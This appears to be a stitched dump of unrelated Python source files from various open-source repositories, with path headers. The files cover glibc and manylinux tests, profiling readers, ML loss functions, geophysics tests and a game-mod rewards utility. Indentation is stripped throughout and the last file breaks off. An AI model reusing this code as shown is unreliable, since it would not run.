def test_is_manylinux_compatible_glibc_support(version, compatible, monkeypatch):
monkeypatch.setitem(sys.modules, "_manylinux", None)
monkeypatch.setattr(_manylinux, "_get_glibc_version", lambda: (2, 5))
assert bool(_is_compatible("manylinux1", "any", version)) == compatible
@pytest.mark.parametrize("version_str", ["glibc-2.4.5", "2"])
def test_check_glibc_version_warning(version_str):
with warnings.catch_warnings(record=True) as w:
_parse_glibc_version(version_str)
assert len(w) == 1
assert issubclass(w[0].category, RuntimeWarning)
@pytest.mark.skipif(not ctypes, reason="requires ctypes")
@pytest.mark.parametrize(
"version_str,expected",
[
# Be very explicit about bytes and Unicode for Python 2 testing.
(b"2.4", "2.4"),
("2.4", "2.4"),
],
)
def test_glibc_version_string(version_str, expected, monkeypatch):
class LibcVersion:
def __init__(self, version_str):
self.version_str = version_str
def __call__(self):
return version_str
class ProcessNamespace:
def __init__(self, libc_version):
self.gnu_get_libc_version = libc_version
process_namespace = ProcessNamespace(LibcVersion(version_str))
monkeypatch.setattr(ctypes, "CDLL", lambda _: process_namespace)
monkeypatch.setattr(_manylinux, "_glibc_version_string_confstr", lambda: False)
assert _glibc_version_string() == expected
del process_namespace.gnu_get_libc_version
assert _glibc_version_string() is None
def test_glibc_version_string_confstr(monkeypatch):
monkeypatch.setattr(os, "confstr", lambda x: "glibc 2.20", raising=False)
assert _glibc_version_string_confstr() == "2.20"
def test_glibc_version_string_fail(monkeypatch):
monkeypatch.setattr(os, "confstr", lambda x: None, raising=False)
monkeypatch.setitem(sys.modules, "ctypes", None)
assert _glibc_version_string() is None
assert _get_glibc_version() == (-1, -1)
@pytest.mark.parametrize(
"failure",
[pretend.raiser(ValueError), pretend.raiser(OSError), lambda x: "XXX"],
)
def test_glibc_version_string_confstr_fail(monkeypatch, failure):
monkeypatch.setattr(os, "confstr", failure, raising=False)
assert _glibc_version_string_confstr() is None
def test_glibc_version_string_confstr_missing(monkeypatch):
monkeypatch.delattr(os, "confstr", raising=False)
assert _glibc_version_string_confstr() is None
def test_glibc_version_string_ctypes_missing(monkeypatch):
monkeypatch.setitem(sys.modules, "ctypes", None)
assert _glibc_version_string_ctypes() is None
def test_glibc_version_string_ctypes_raise_oserror(monkeypatch):
def patched_cdll(name):
raise OSError("Dynamic loading not supported")
monkeypatch.setattr(ctypes, "CDLL", patched_cdll)
assert _glibc_version_string_ctypes() is None
@pytest.mark.skipif(platform.system() != "Linux", reason="requires Linux")
def test_is_manylinux_compatible_old():
# Assuming no one is running this test with a version of glibc released in
# 1997.
assert _is_compatible("any", "any", (2, 0))
def test_is_manylinux_compatible(monkeypatch):
monkeypatch.setattr(_manylinux, "_glibc_version_string", lambda: "2.4")
assert _is_compatible("", "any", (2, 4))
def test_glibc_version_string_none(monkeypatch):
monkeypatch.setattr(_manylinux, "_glibc_version_string", lambda: None)
assert not _is_compatible("any", "any", (2, 4))
def test_is_linux_armhf_not_elf(monkeypatch):
monkeypatch.setattr(_manylinux, "_get_elf_header", lambda: None)
assert not _is_linux_armhf()
def test_is_linux_i686_not_elf(monkeypatch):
monkeypatch.setattr(_manylinux, "_get_elf_header", lambda: None)
assert not _is_linux_i686()
@pytest.mark.parametrize(
"machine, abi, elf_class, elf_data, elf_machine",
[
(
"x86_64",
"x32",
_ELFFileHeader.ELFCLASS32,
_ELFFileHeader.ELFDATA2LSB,
_ELFFileHeader.EM_X86_64,
),
(
"x86_64",
"i386",
_ELFFileHeader.ELFCLASS32,
_ELFFileHeader.ELFDATA2LSB,
_ELFFileHeader.EM_386,
),
(
"x86_64",
"amd64",
_ELFFileHeader.ELFCLASS64,
_ELFFileHeader.ELFDATA2LSB,
_ELFFileHeader.EM_X86_64,
),
(
"armv7l",
"armel",
_ELFFileHeader.ELFCLASS32,
_ELFFileHeader.ELFDATA2LSB,
_ELFFileHeader.EM_ARM,
),
(
"armv7l",
"armhf",
_ELFFileHeader.ELFCLASS32,
_ELFFileHeader.ELFDATA2LSB,
_ELFFileHeader.EM_ARM,
),
(
"s390x",
"s390x",
_ELFFileHeader.ELFCLASS64,
_ELFFileHeader.ELFDATA2MSB,
_ELFFileHeader.EM_S390,
),
],
)
def test_get_elf_header(monkeypatch, machine, abi, elf_class, elf_data, elf_machine):
path = os.path.join(
os.path.dirname(__file__),
"manylinux",
f"hello-world-{machine}-{abi}",
)
monkeypatch.setattr(sys, "executable", path)
elf_header = _get_elf_header()
assert elf_header.e_ident_class == elf_class
assert elf_header.e_ident_data == elf_data
assert elf_header.e_machine == elf_machine
@pytest.mark.parametrize(
"content", [None, "invalid-magic", "invalid-class", "invalid-data", "too-short"]
)
def test_get_elf_header_bad_executable(monkeypatch, content):
if content:
path = os.path.join(
os.path.dirname(__file__),
"manylinux",
f"hello-world-{content}",
)
else:
path = None
monkeypatch.setattr(sys, "executable", path)
assert _get_elf_header() is None
|
tests/config/test_cfg_alt.py | ThePrez/gunicorn | 6,851 | 12671501 | proc_name = "not-fooey"
|
mac/pyobjc-framework-Quartz/PyObjCTest/test_ciimage.py | albertz/music-player | 132 | 12671519 |
from PyObjCTools.TestSupport import *
from Quartz.QuartzCore import *
try:
long
except NameError:
long = int
try:
unicode
except NameError:
unicode = str
class TestCIImage (TestCase):
def testConstants(self):
self.assertIsInstance(kCIFormatARGB8, (int, long))
self.assertIsInstance(kCIFormatRGBA16, (int, long))
self.assertIsInstance(kCIFormatRGBAf, (int, long))
self.assertIsInstance(kCIImageColorSpace, unicode)
def testMethods(self):
self.assertArgIsBOOL(CIImage.imageWithTexture_size_flipped_colorSpace_, 2)
self.assertArgIsBOOL(CIImage.initWithTexture_size_flipped_colorSpace_, 2)
if __name__ == "__main__":
main()
|
ch04_linear/code/generate_data.py | wellszhao/intro_ds_wy_course | 146 | 12671523 | <gh_stars>100-1000
# -*- coding: UTF-8 -*-
"""
This script randomly generates training data for a linear regression model
"""
import os
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
def generate_data():
"""
    Randomly generate the data
"""
    # Fix the seed for random number generation
np.random.seed(4889)
    # range() is not compatible between Python 2 and Python 3, so use list(range(10, 29))
x = np.array([10] + list(range(10, 29)))
error = np.round(np.random.randn(20), 2)
y = x + error
return pd.DataFrame({"x": x, "y": y})
def visualize_data(data):
"""
    Visualize the data
"""
    # Create a figure frame and draw a single plot inside it
fig = plt.figure(figsize=(6, 6), dpi=80)
ax = fig.add_subplot(111)
    # Configure the axes
ax.set_xlabel("$x$")
ax.set_xticks(range(10, 31, 5))
ax.set_ylabel("$y$")
ax.set_yticks(range(10, 31, 5))
    # Draw a scatter plot with blue points
ax.scatter(data.x, data.y, color="b",
label="$y = x + \epsilon$")
plt.legend(shadow=True)
    # Show the figure drawn above. It blocks execution until all figures are closed.
    # In a Python shell, the parameter "block=False" can be set to disable the blocking.
plt.show()
if __name__ == "__main__":
data = generate_data()
home_path = os.path.dirname(os.path.abspath(__file__))
    # Save the data; the storage path on Windows differs from Linux
if os.name == "nt":
data.to_csv("%s\\simple_example.csv" % home_path, index=False)
else:
data.to_csv("%s/simple_example.csv" % home_path, index=False)
visualize_data(data) |
L1Trigger/L1TMuon/python/simMuonQualityAdjusterDigis_cfi.py | ckamtsikis/cmssw | 852 | 12671526 | import FWCore.ParameterSet.Config as cms
import os
simMuonQualityAdjusterDigis = cms.EDProducer('L1TMuonQualityAdjuster',
bmtfInput = cms.InputTag("simBmtfDigis", "BMTF"),
omtfInput = cms.InputTag("simOmtfDigis", "OMTF"),
emtfInput = cms.InputTag("simEmtfDigis", "EMTF"),
bmtfBxOffset = cms.int32(0),
)
|
model/item.py | luerhard/remapy | 172 | 12671532 | <reponame>luerhard/remapy<filename>model/item.py
from datetime import datetime
import time
from pathlib import Path
import json
from api.remarkable_client import RemarkableClient
import utils.config
#
# DEFINITIONS
#
STATE_SYNCING = 1
STATE_SYNCED = 2
STATE_DELETED = 170591
RFC3339Nano = "%Y-%m-%dT%H:%M:%SZ"
#
# HELPER
#
def get_path(id):
return "%s/%s" % (utils.config.PATH, id)
def get_path_remapy(id):
return "%s/.remapy" % get_path(id)
def get_path_metadata_local(id):
return "%s/metadata.local" % get_path_remapy(id)
def now_rfc3339():
return datetime.utcnow().strftime(RFC3339Nano)
#
# CLASS
#
class Item(object):
#
# CTOR
#
def __init__(self, metadata, parent=None):
self.metadata = metadata
self._parent = parent
self._children = []
self.path = get_path(self.id())
self.path_remapy = get_path_remapy(self.id())
self.path_metadata_local = get_path_metadata_local(self.id())
self.rm_client = RemarkableClient()
self.state_listener = []
#
# Getter and setter
#
def is_trash(self):
return self.id() == "trash"
def is_root(self):
return self.metadata is None
def id(self):
return self._meta_value("ID")
def name(self):
return self._meta_value("VissibleName")
def version(self):
return self._meta_value("Version", -1)
def bookmarked(self):
return self._meta_value("Bookmarked", False)
def is_document(self):
return self._meta_value("Type", "CollectionType") == "DocumentType"
def is_collection(self):
return self._meta_value("Type", "CollectionType") != "DocumentType"
def modified_time(self):
modified = self.metadata["ModifiedClient"]
if modified == None:
return None
try:
utc = datetime.strptime(modified, "%Y-%m-%dT%H:%M:%S.%fZ")
except:
utc = datetime.strptime(modified, "%Y-%m-%dT%H:%M:%SZ")
try:
epoch = time.mktime(utc.timetuple())
offset = datetime.fromtimestamp(epoch) - datetime.utcfromtimestamp(epoch)
except:
print("(Warning) Failed to parse datetime for item %s" % self.id())
return datetime(1970, 1, 1, 0, 0, 0)
return utc + offset
def parent(self):
return self._parent
def children(self):
return self._children
def _meta_value(self, key, root_value=""):
if self.is_root():
return root_value
return self.metadata[key]
#
# Functions
#
def set_bookmarked(self, bookmarked):
if self.is_trash() or self.is_root():
return
self.metadata["Bookmarked"] = bookmarked
self.metadata["ModifiedClient"] = now_rfc3339()
self.metadata["Version"] += 1
self.rm_client.update_metadata(self.metadata)
self._write_remapy_file()
self._update_state_listener()
def rename(self, new_name):
if self.is_trash() or self.is_root():
return
self.metadata["VissibleName"] = new_name
self.metadata["ModifiedClient"] = now_rfc3339()
self.metadata["Version"] += 1
self.rm_client.update_metadata(self.metadata)
self._write_remapy_file()
self._update_state_listener()
def move(self, new_parent):
if self.is_trash() or self.is_root():
return
self._parent = new_parent
self.metadata["Parent"] = new_parent.id()
self.metadata["ModifiedClient"] = now_rfc3339()
self.metadata["Version"] += 1
self.rm_client.update_metadata(self.metadata)
self._write_remapy_file()
self._update_state_listener()
def add_state_listener(self, listener):
self.state_listener.append(listener)
def _update_state_listener(self):
for listener in self.state_listener:
listener(self)
def _write_remapy_file(self):
if self.is_root():
return
Path(self.path_remapy).mkdir(parents=True, exist_ok=True)
with open(self.path_metadata_local, "w") as out:
out.write(json.dumps(self.metadata, indent=4)) |
hover/utils/denoising.py | phurwicz/hover | 251 | 12671558 | import math
import numpy as np
import torch
from collections import defaultdict
from hover.utils.torch_helper import cross_entropy_with_probs
def loss_coteaching_directed(y_student, y_teacher, target, forget_rate):
"""
Subroutine for loss_coteaching_graph.
"""
num_remember = math.ceil((1 - forget_rate) * target.size(0))
assert (
num_remember > 0
), f"Expected at least one remembered target, got {num_remember}"
loss_teacher_detail = cross_entropy_with_probs(y_teacher, target, reduction="none")
idx_to_learn = np.argsort(loss_teacher_detail.data)[:num_remember]
loss_student = cross_entropy_with_probs(
y_student[idx_to_learn], target[idx_to_learn], reduction="mean"
).unsqueeze(0)
return loss_student
def prediction_disagreement(pred_list, reduce=False):
"""
Compute disagreements between predictions.
"""
disagreement = defaultdict(dict)
for i in range(0, len(pred_list)):
for j in range(i, len(pred_list)):
_disagreed = np.not_equal(pred_list[i], pred_list[j])
if reduce:
_disagreed = np.mean(_disagreed)
disagreement[i][j] = _disagreed
disagreement[j][i] = _disagreed
return dict(disagreement)
def loss_coteaching_graph(y_list, target, tail_head_adjacency_list, forget_rate):
"""
Co-teaching from differences.
Generalized to graph representation where each vertex is a classifier and each edge is a source to check differences with and to learn from.
y_list: list of logits from different classifiers.
target: target, which is allowed to be probabilistic.
tail_head_adjacency_list: the 'tail' classifier learns from the 'head'.
forget_rate: the proportion of high-loss contributions to discard.
"""
# initialize co-teaching losses
loss_list = []
for i in range(0, len(y_list)):
assert tail_head_adjacency_list[i], f"Expected at least one teacher for {i}"
_losses = []
for j in tail_head_adjacency_list[i]:
# fetch yi as student(tail), yj as teacher(head)
_yi, _yj = y_list[i], y_list[j]
_tar = target
# add loss contribution to list
_contribution = loss_coteaching_directed(_yi, _yj, _tar, forget_rate)
_losses.append(_contribution)
# concatenate and average up
_loss = torch.mean(torch.cat(_losses))
loss_list.append(_loss)
return loss_list
def identity_adjacency(info_dict):
"""
Each node points to itself.
"""
refs = []
acc_list = info_dict["accuracy"]
for i in range(0, len(acc_list)):
refs.append([i])
return refs
def cyclic_adjacency(info_dict, acc_bar=0.5):
"""
Nodes form a cycle.
Triggers if accuracies are high enough.
"""
refs = []
acc_list = info_dict["accuracy"]
for i in range(0, len(acc_list)):
candidate = (i + 1) % (len(acc_list))
if acc_list[i] > acc_bar and acc_list[candidate] > acc_bar:
refs.append([candidate])
else:
refs.append([i])
return refs
def cyclic_except_last(info_dict, acc_bar=0.5):
"""
Cyclic except the last member.
Triggers if accuracies are high enough.
"""
refs = []
acc_list = info_dict["accuracy"]
for i in range(0, len(acc_list) - 1):
candidate = (i + 1) % (len(acc_list) - 1)
if acc_list[i] > acc_bar and acc_list[candidate] > acc_bar:
refs.append([candidate])
else:
refs.append([i])
refs.append([len(acc_list) - 1])
return refs
def accuracy_priority(info_dict, acc_bar=0.5):
"""
Every node points at the most accurate member that is not itself.
Triggers if accuracies are high enough.
"""
refs = []
acc_list = info_dict["accuracy"]
for i in range(0, len(acc_list)):
top_candidates = sorted(
range(len(acc_list)), key=lambda j: acc_list[j], reverse=True
)
candidate = top_candidates[0] if top_candidates[0] != i else top_candidates[1]
if acc_list[i] > acc_bar and acc_list[candidate] > acc_bar:
refs.append([candidate])
else:
refs.append([i])
return refs
def disagreement_priority(info_dict, acc_bar=0.5):
"""
    Every node points at the most different member that is not itself.
Triggers if accuracies are high enough.
"""
refs = []
acc_list = info_dict["accuracy"]
disagree_dict = info_dict["disagreement_rate"]
for i in range(0, len(acc_list)):
top_candidates = sorted(
disagree_dict[i].keys(), key=lambda j: disagree_dict[i][j], reverse=True
)
candidate = top_candidates[0] if top_candidates[0] != i else top_candidates[1]
if acc_list[i] > acc_bar and acc_list[candidate] > acc_bar:
refs.append([candidate])
else:
refs.append([i])
return refs
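# Hedged usage sketch (illustrative shapes and values only): two classifiers
# teach each other on a small batch using a cyclic adjacency, with the 20%
# highest-loss contributions (as judged by each teacher) discarded.
def _example_coteaching():
    y_list = [torch.randn(8, 3), torch.randn(8, 3)]  # logits from two classifiers
    target = torch.nn.functional.one_hot(torch.randint(0, 3, (8,)), 3).float()
    refs = cyclic_adjacency({"accuracy": [0.9, 0.8]})  # -> [[1], [0]]
    return loss_coteaching_graph(y_list, target, refs, forget_rate=0.2)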
|
examples/nitro.py | msabramo/diesel | 224 | 12671573 | <gh_stars>100-1000
from pynitro import NitroFrame
from diesel.protocols.nitro import DieselNitroSocket
from diesel import quickstart, quickstop
#loc = "tcp://127.0.0.1:4444"
loc = "inproc://foobar"
def server():
with DieselNitroSocket(bind=loc) as sock:
while True:
m = sock.recv()
sock.send(NitroFrame("you said: " + m.data))
def client():
with DieselNitroSocket(connect=loc) as sock:
for x in xrange(100000):
sock.send(NitroFrame("Hello, dude!"))
m = sock.recv()
assert m.data == "you said: Hello, dude!"
quickstop()
quickstart(server, client)
|
python-for-beginners/02 - Print/coding_challenge_solution.py | vijayraavi/c9-python-getting-started | 8,041 | 12671580 | # Here's a challenge for you to help you practice
# See if you can fix the code below
# print the message
# There was a single quote inside the string!
# Use double quotes to enclose the string
print("Why won't this line of code print")
# print the message
# There was a mistake in the function name
print('This line fails too!')
# print the message
# Need to add the () around the string
print ("I think I know how to fix this one")
# print the name entered by the user
# You need to store the value returned by the input statement
# in a variable
name = input('Please tell me your name: ')
print(name)
|
scripts/nvvpreader/nvvpreader.py | SymbioticLab/Salus | 104 | 12671669 | #
# Copyright 2019 <NAME> <<EMAIL>>
#
# This file is part of Salus
# (see https://github.com/SymbioticLab/Salus).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import, print_function, division
import sqlite3 as sql
import struct
import pandas as pd
from datetime import datetime
from tqdm import tqdm
metric_name = {
19923062: 'achieved_occupancy',
19923058: 'executed_ipc'
}
event_name = {
83886184: 'active_warps',
83886182: 'active_cycles',
83886183: 'elapsed_cycles_sm',
}
def parseMetricValue(binstr):
return struct.unpack('d', binstr)[0]
def parseEventValue(s):
return int(s)
def parseNanoTime(nanotime):
return datetime.utcfromtimestamp(nanotime / 1e9)
class Metric(object):
def __init__(self, row):
super(Metric, self).__init__()
class Kernel(object):
def __init__(self, row, refpoint):
super(Kernel, self).__init__()
self.id = row['correlationId']
self.start = row['start'] - refpoint
self.end = row['end'] - refpoint
self.duration = self.end - self.start
self.name = row['name']
class NvvpReader(object):
def __init__(self, filepath, progress=False):
super(NvvpReader, self).__init__()
self.filepath = filepath
self.dbLoaded = False
self.loadDB(progress)
def loadDB(self, progress):
if self.dbLoaded:
return
self.dbLoaded = True
self.conn = sql.connect(self.filepath)
self.conn.row_factory = sql.Row
prog_wrapper = tqdm if progress else lambda x, *args, **kwargs: x
cursor = self.conn.cursor()
# get timeline reference point (start time of the first overhead event is 0ns)
cursor.execute("""select start from CUPTI_ACTIVITY_KIND_OVERHEAD order by start""")
(self.refpoint, ) = cursor.fetchone()
self.refpoint = parseNanoTime(self.refpoint)
# get all kernels
total_amount = 0
if progress:
cursor.execute('select count(*) from CUPTI_ACTIVITY_KIND_KERNEL')
(total_amount, ) = cursor.fetchone()
cursor.execute("""select strings.value as strname, kernel.*
from CUPTI_ACTIVITY_KIND_KERNEL as kernel, StringTable as strings
where kernel.name = strings._id_""")
# create dataset
data = []
cursor2 = self.conn.cursor()
for row in prog_wrapper(cursor, total=total_amount):
correlationId = row['correlationId']
kernel = {
'id': correlationId,
'start': parseNanoTime(row['start']),
'end': parseNanoTime(row['end']),
'duration': row['end'] - row['start'],
'name': row['strname'],
}
# fetch all instances metric on this kernel
for ins, val, metric_id in cursor2.execute("""select instance, value, id
from CUPTI_ACTIVITY_KIND_METRIC_INSTANCE
where correlationId=?""",
[correlationId]):
val = parseMetricValue(val)
observation = {
'metric': metric_name[metric_id],
'sm': ins,
'metric_val': val
}
observation.update(kernel)
data.append(observation)
# fetch all aggregated metric
for val, metric_id in cursor2.execute("""select value, id
from CUPTI_ACTIVITY_KIND_METRIC
where correlationId=?""",
[correlationId]):
val = parseMetricValue(val)
observation = {
'metric': metric_name[metric_id],
'sm': -1,
'metric_val': val
}
observation.update(kernel)
data.append(observation)
# fetch all instances events on this kernel
for ins, val, event_id in cursor2.execute("""select instance, value, id
from CUPTI_ACTIVITY_KIND_EVENT_INSTANCE
where correlationId=?""",
[correlationId]):
val = parseEventValue(val)
observation = {
'event': event_name[event_id],
'sm': ins,
'event_val': val
}
observation.update(kernel)
data.append(observation)
# fetch all aggregated events on this kernel
for val, event_id in cursor2.execute("""select value, id
from CUPTI_ACTIVITY_KIND_EVENT
where correlationId=?""",
[correlationId]):
val = parseEventValue(val)
observation = {
'event': event_name[event_id],
'sm': -1,
'event_val': val
}
observation.update(kernel)
data.append(observation)
self.kernels = pd.DataFrame(data)
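# Hedged usage sketch (the profile path is a placeholder): load an nvprof/nvvp
# SQLite export and inspect the per-kernel metric and event observations.
def _example_read_profile(path="profile.nvvp"):
    reader = NvvpReader(path, progress=True)
    # 'kernels' is a long-format DataFrame with one row per (kernel, metric/event, SM) observation
    return reader.kernels.head()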
|
tests/em/static/test_DC_1D_jvecjtvecadj.py | Prithwijit-Chak/simpeg | 358 | 12671691 | <filename>tests/em/static/test_DC_1D_jvecjtvecadj.py
from __future__ import print_function
import unittest
import numpy as np
from discretize import TensorMesh
from SimPEG import (
maps,
data_misfit,
regularization,
inversion,
optimization,
inverse_problem,
tests,
)
from SimPEG.utils import mkvc
from SimPEG.electromagnetics import resistivity as dc
np.random.seed(40)
TOL = 1e-5
FLR = 1e-20 # "zero", so if residual below this --> pass regardless of order
class DC1DSimulation(unittest.TestCase):
def setUp(self):
ntx = 31
xtemp_txP = np.logspace(1, 3, ntx)
xtemp_txN = -xtemp_txP
ytemp_tx = np.zeros(ntx)
xtemp_rxP = -5
xtemp_rxN = 5
ytemp_rx = 0.0
abhalf = abs(xtemp_txP - xtemp_txN) * 0.5
a = xtemp_rxN - xtemp_rxP
b = ((xtemp_txN - xtemp_txP) - a) * 0.5
# We generate tx and rx lists:
srclist = []
for i in range(ntx):
rx = dc.receivers.Dipole(
np.r_[xtemp_rxP, ytemp_rx, -12.5], np.r_[xtemp_rxN, ytemp_rx, -12.5]
)
locA = np.r_[xtemp_txP[i], ytemp_tx[i], -12.5]
locB = np.r_[xtemp_txN[i], ytemp_tx[i], -12.5]
src = dc.sources.Dipole([rx], locA, locB)
srclist.append(src)
survey = dc.survey.Survey(srclist)
rho = np.r_[10, 10, 10]
dummy_hz = 100.0
hz = np.r_[10, 10, dummy_hz]
mesh = TensorMesh([hz])
simulation = dc.simulation_1d.Simulation1DLayers(
survey=survey,
rhoMap=maps.ExpMap(mesh),
thicknesses=hz[:-1],
data_type="apparent_resistivity",
)
simulation.dpred(np.log(rho))
mSynth = np.log(rho)
dobs = simulation.make_synthetic_data(mSynth, add_noise=True)
# Now set up the problem to do some minimization
dmis = data_misfit.L2DataMisfit(simulation=simulation, data=dobs)
reg = regularization.Tikhonov(mesh)
opt = optimization.InexactGaussNewton(
maxIterLS=20, maxIter=10, tolF=1e-6, tolX=1e-6, tolG=1e-6, maxIterCG=6
)
invProb = inverse_problem.BaseInvProblem(dmis, reg, opt, beta=0.0)
inv = inversion.BaseInversion(invProb)
self.inv = inv
self.reg = reg
self.p = simulation
self.mesh = mesh
self.m0 = mSynth
self.survey = survey
self.dmis = dmis
self.dobs = dobs
def test_misfit(self):
passed = tests.checkDerivative(
lambda m: [self.p.dpred(m), lambda mx: self.p.Jvec(self.m0, mx)],
self.m0,
plotIt=False,
num=3,
)
self.assertTrue(passed)
def test_adjoint(self):
# Adjoint Test
# u = np.random.rand(self.mesh.nC*self.survey.nSrc)
v = np.random.rand(self.mesh.nC)
w = np.random.rand(mkvc(self.dobs).shape[0])
wtJv = w.dot(self.p.Jvec(self.m0, v))
vtJtw = v.dot(self.p.Jtvec(self.m0, w))
passed = np.abs(wtJv - vtJtw) < 1e-8
print("Adjoint Test", np.abs(wtJv - vtJtw), passed)
self.assertTrue(passed)
def test_dataObj(self):
passed = tests.checkDerivative(
lambda m: [self.dmis(m), self.dmis.deriv(m)], self.m0, plotIt=False, num=3
)
self.assertTrue(passed)
if __name__ == "__main__":
unittest.main()
|
typed_python/compiler/function_metadata.py | APrioriInvestments/typed_python | 105 | 12671735 | class FunctionMetadata:
def __init__(self):
self._constantReturnValue = ()
def setConstantReturnValue(self, value):
self._constantReturnValue = (value,)
def hasConstantReturnValue(self):
return self._constantReturnValue
def getConstantReturnValue(self):
return self._constantReturnValue[0] if self._constantReturnValue else None
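# Minimal usage sketch (illustrative value only): record a known constant return
# value on a FunctionMetadata object and read it back.
if __name__ == "__main__":
    _meta = FunctionMetadata()
    _meta.setConstantReturnValue(42)
    assert _meta.hasConstantReturnValue()
    assert _meta.getConstantReturnValue() == 42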
|
uq360/utils/transformers/original_features.py | Sclare87/UQ360 | 148 | 12671751 | from uq360.utils.transformers.feature_transformer import FeatureTransformer
class OriginalFeaturesTransformer(FeatureTransformer):
'''
Dummy/identity transformer which passes the data array through unchanged.
'''
def __init__(self):
super(OriginalFeaturesTransformer, self).__init__()
@classmethod
def name(cls):
return ('original_features')
def transform(self, x, predictions):
return x
def save(self, output_dir=None):
pass
def load(self, input_dir=None):
pass
|
Python/Biopython/read_seq.py | Gjacquenot/training-material | 115 | 12671759 | <filename>Python/Biopython/read_seq.py
#!/usr/bin/env python
from argparse import ArgumentParser
from Bio import SeqIO, SeqUtils
from collections import namedtuple
SeqStats = namedtuple('SeqStats', ['length', 'gc', 'weight'])
def compute_stats(seq):
    # Build an actual SeqStats instance instead of mutating the namedtuple class
    try:
        weight = SeqUtils.molecular_weight(seq)
    except ValueError:
        weight = None
    return SeqStats(length=len(seq), gc=SeqUtils.GC(seq), weight=weight)
if __name__ == '__main__':
arg_parser = ArgumentParser(description='Read sequence file and '
'compute some statistics')
arg_parser.add_argument('file', help='sequence file to parse')
arg_parser.add_argument('--format', default='fasta', help='file format')
options = arg_parser.parse_args()
seqs = {}
for seq_record in SeqIO.parse(options.file, options.format):
seqs[seq_record.id] = seq_record.seq
fmt_str = ('id: {id}\n\t'
'length: {stats.length}\n\t'
'gc: {stats.gc}\n\t'
'molecular weight: {stats.weight}')
for id, seq in seqs.items():
seq_stats = compute_stats(seq)
print(fmt_str.format(id=id, stats=seq_stats))
print('{0:d} sequences'.format(len(seqs)))
|
Python-3/basic_examples/decorator.py | ghiloufibelgacem/jornaldev | 1,139 | 12671765 | array = ['a', 'b', 'c']
def decorator(func):
def newValueOf(pos):
if pos >= len(array):
print("Oops! Array index is out of range")
return
func(pos)
return newValueOf
@decorator
def valueOf(index):
print(array[index])
valueOf(10)
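# Expected output: "Oops! Array index is out of range", because 10 is past the
# end of the three-element array; valueOf(1) would print 'b' instead.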
|
aries_cloudagent/tails/error.py | kuraakhilesh8230/aries-cloudagent-python | 247 | 12671818 | """Tails server related errors."""
from ..core.error import BaseError
class TailsServerNotConfiguredError(BaseError):
"""Error indicating the tails server plugin hasn't been configured."""
|
src/sims4communitylib/utils/whims/common_satisfaction_reward_store_utils.py | velocist/TS4CheatsInfo | 118 | 12671843 | <reponame>velocist/TS4CheatsInfo<gh_stars>100-1000
"""
The Sims 4 Community Library is licensed under the Creative Commons Attribution 4.0 International public license (CC BY 4.0).
https://creativecommons.org/licenses/by/4.0/
https://creativecommons.org/licenses/by/4.0/legalcode
Copyright (c) COLONOLNUTTY
"""
from typing import Tuple, Dict, Callable, Iterator
import sims4.collections
from rewards.reward import Reward
from sims4.resources import Types
from sims4communitylib.utils.common_resource_utils import CommonResourceUtils
from sims4communitylib.utils.whims.common_satisfaction_reward_store_item import CommonSatisfactionRewardStoreItem
from whims.whims_tracker import WhimsTracker
class CommonSatisfactionRewardStoreUtils:
"""Utilities for manipulating the Satisfaction Rewards Store.
"""
@staticmethod
def add_reward_trait_to_rewards_store(reward_trait_definition_id: int, reward_point_cost: int) -> bool:
"""add_reward_trait_to_rewards_store(reward_trait_definition_id, reward_point_cost)
Add a Reward Trait to the Satisfaction Rewards Store.
:param reward_trait_definition_id: The decimal identifier of a Reward Trait.
:type reward_trait_definition_id: int
:param reward_point_cost: The amount of Satisfaction Reward Points the Reward Trait will cost the Sim to receive.
:type reward_point_cost: int
:return: True, if the Trait was added to the Rewards Store successfully. False, if not.
:rtype: bool
"""
return CommonSatisfactionRewardStoreUtils._add_reward_to_rewards_store(reward_trait_definition_id, reward_point_cost, WhimsTracker.WhimAwardTypes.TRAIT)
@staticmethod
def add_reward_buff_to_rewards_store(reward_buff_definition_id: int, reward_point_cost: int) -> bool:
"""add_reward_buff_to_rewards_store(reward_buff_definition_id, reward_point_cost)
Add a Reward Buff to the Satisfaction Rewards Store.
:param reward_buff_definition_id: The decimal identifier of a Reward Buff.
:type reward_buff_definition_id: int
:param reward_point_cost: The amount of Satisfaction Reward Points the Reward Buff will cost the Sim to receive.
:type reward_point_cost: int
:return: True, if the Reward Buff was added to the Rewards Store successfully. False, if not.
:rtype: bool
"""
return CommonSatisfactionRewardStoreUtils._add_reward_to_rewards_store(reward_buff_definition_id, reward_point_cost, WhimsTracker.WhimAwardTypes.BUFF)
@staticmethod
def add_reward_object_to_rewards_store(reward_object_definition_id: int, reward_point_cost: int) -> bool:
"""add_reward_object_to_rewards_store(reward_object_definition_id, reward_point_cost)
Add a Reward Object to the Satisfaction Rewards Store.
:param reward_object_definition_id: The decimal identifier of a Reward Object.
:type reward_object_definition_id: int
:param reward_point_cost: The amount of Satisfaction Reward Points the Reward Object will cost the Sim to receive.
:type reward_point_cost: int
:return: True, if the Reward Object was added to the Rewards Store successfully. False, if not.
:rtype: bool
"""
return CommonSatisfactionRewardStoreUtils._add_reward_to_rewards_store(reward_object_definition_id, reward_point_cost, WhimsTracker.WhimAwardTypes.OBJECT)
@staticmethod
def add_reward_cas_part_to_rewards_store(reward_cas_part_definition_id: int, reward_point_cost: int) -> bool:
"""add_reward_cas_part_to_rewards_store(reward_cas_part_definition_id, reward_point_cost)
Add a Reward CAS Part to the Satisfaction Rewards Store.
:param reward_cas_part_definition_id: The decimal identifier of a Reward CAS Part.
:type reward_cas_part_definition_id: int
:param reward_point_cost: The amount of Satisfaction Reward Points the Reward CAS Part will cost the Sim to receive.
:type reward_point_cost: int
:return: True, if the Reward CAS Part was added to the Rewards Store successfully. False, if not.
:rtype: bool
"""
return CommonSatisfactionRewardStoreUtils._add_reward_to_rewards_store(reward_cas_part_definition_id, reward_point_cost, WhimsTracker.WhimAwardTypes.CASPART)
@staticmethod
def remove_reward_from_rewards_store(reward_item_definition_id: int) -> bool:
"""remove_reward_from_rewards_store(reward_item_definition_id)
Remove a Reward Item from the Satisfaction Rewards Store.
:param reward_item_definition_id: The decimal identifier of a Reward Item.
:type reward_item_definition_id: int
:return: True, if the Reward Item was removed from the Rewards Store successfully. False, if not.
